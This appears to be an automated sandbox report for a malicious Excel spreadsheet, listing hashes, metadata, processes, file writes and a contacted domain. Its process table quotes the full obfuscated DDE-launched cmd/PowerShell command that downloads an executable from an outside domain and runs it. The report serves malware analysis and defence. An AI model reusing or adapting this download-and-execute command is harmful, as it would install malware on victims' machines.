File name: | 12_46da8413.2050406.xls |
Full analysis: | https://app.any.run/tasks/353f8778-118f-4599-b33e-f960385f0d90 |
Verdict: | Malicious activity |
Analysis date: | November 14, 2018, 07:24:24 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Oct 19 08:59:05 2017, Last Saved Time/Date: Mon Dec 18 07:23:27 2017, Security: 0 |
MD5: | E57F8E8BC90F3E9CFB7211C0730353F5 |
SHA1: | 39103B95D2A626612A9F9644361162D24C150358 |
SHA256: | D66B480E06F3A844A9C30A1A6A0966C3D0922F95DA2010E03A328504F1B449D0 |
SSDEEP: | 1536:fUdvxHlcaQPy0iWYOcG4BDhnxD7oOEdxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAnr:fUdvxHlcaAy0iWYOcG4BDhnxD7oOEdxf |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
Software: | Microsoft Excel |
---|---|
CreateDate: | 2017:10:19 07:59:05 |
ModifyDate: | 2017:12:18 07:23:27 |
Security: | None |
CodePage: | Unicode (UTF-8) |
AppVersion: | 14 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | 12月 |
HeadingPairs: |
|
CompObjUserTypeLen: | 31 |
CompObjUserType: | Microsoft Excel 2003 Worksheet |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3636 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3936 | cMD.exe /c "p^ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='';$uy='carom';$ji='.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'http://homerbongasi.com/pvideo.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)" | C:\Windows\system32\cMD.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2348 | powERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='';$uy='carom';$ji='.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'http://homerbongasi.com/pvideo.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cMD.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3636 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR3071.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3636 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex | — | |
MD5:— | SHA256:— | |||
2348 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KHE59LCKQIFM7IMXHIBA.temp | — | |
MD5:— | SHA256:— | |||
2348 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF183ae1.TMP | binary | |
MD5:2E6C332796340AFFBFF5230455889D0D | SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E | |||
2348 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2E6C332796340AFFBFF5230455889D0D | SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E |
Domain | IP | Reputation |
---|---|---|
homerbongasi.com |
| unknown |